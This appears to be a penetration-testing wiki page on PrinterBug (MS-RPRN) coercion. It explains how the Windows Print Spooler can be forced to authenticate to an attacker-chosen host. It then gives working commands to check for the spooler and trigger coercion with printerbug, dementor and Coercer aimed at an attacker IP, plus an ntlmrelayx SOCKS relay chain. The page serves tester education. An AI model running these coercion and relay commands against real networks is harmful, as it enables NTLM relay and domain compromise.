MS-RPRN abuse (PrinterBug)

Theory

Microsoft’s Print Spooler is a service handling the print jobs and other various tasks related to printing. An attacker controling a domain user/computer can, with a specific RPC call, trigger the spooler service of a target running it and make it authenticate to a target of the attacker's choosing. This flaw is a "won't fix" and enabled by default on all Windows environments (more info on the finding).

The coerced authentications are made over SMB. But MS-RPRN abuse can be combined with WebClient abuse to elicit incoming authentications made over HTTP which heightens NTLM relay capabilities.

The "specific call" mentioned above is the RpcRemoteFindFirstPrinterChangeNotificationEx notification method, which is part of the MS-RPRN protocol. MS-RPRN is Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server.

The attacker needs a foothold on the domain (i.e. compromised account) for this attack to work since the coercion is operated through an RPC call in the SMB \pipe\spoolss named pipe through the IPC$ share.

Practice

Remotely checking if the spooler is available can be done with SpoolerScanner (Powershell) or with rpcdump (Python).

The spooler service can be triggered with printerbug or SpoolSample (C#). There are many alternatives available publicly on the Internet.

rpcdump

We can check if the spooler service is available on a target using rpcdump.py from impacket.

rpcdump.py $TARGET | grep -A 6 "spoolsv"

NetExec

NetExec (Python) can be used to check if the spooler service is running.

netexec smb <TARGET> -u <USER> -p <PASSWORD> -M spooler
netexec smb <TARGET> -u <USER> -p <PASSWORD> --local-auth -M spooler

SpoolerScanner

Check if the spooler service is available (Windows) using SpoolerScanner (Powershell)

.\SpoolerScan.ps1

PrinterBug

Using printerbug (python) we can trigger the spooler to authenticate against our cotrolled server.

printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'

Dementor

Using dementor (python) we can trigger the spooler to authenticate against our cotrolled server.

python dementor.py -d $DOMAIN -u $USERNAME -p $PASSWORD $ATTACKER_IP $TARGET_IP

Coercer

Yet another alternative is to use the Coercer tool (python) as follow.

# Coerce
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-protocol-name MS-RPRN -l $ATTACKER_IP -t $TARGET_IP

# Coerce a specific method
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-method-name RpcRemoteFindFirstPrinterChangeNotificationEx -l $ATTACKER_IP -t $TARGET_IP

In the situation where the tester doesn't have any credentials, it is still possible to relay an authentication and trigger the spooler service of a target via a SOCKS proxy.

ntlmrelayx.py -t smb://$TARGET -socks
proxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'

Nota bene: coerced NTLM authentications made over SMB restrict the possibilites of NTLM relay. For instance, an "unsigning cross-protocols relay attack" from SMB to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.

Resources

Last updated 1 year ago

Was this helpful?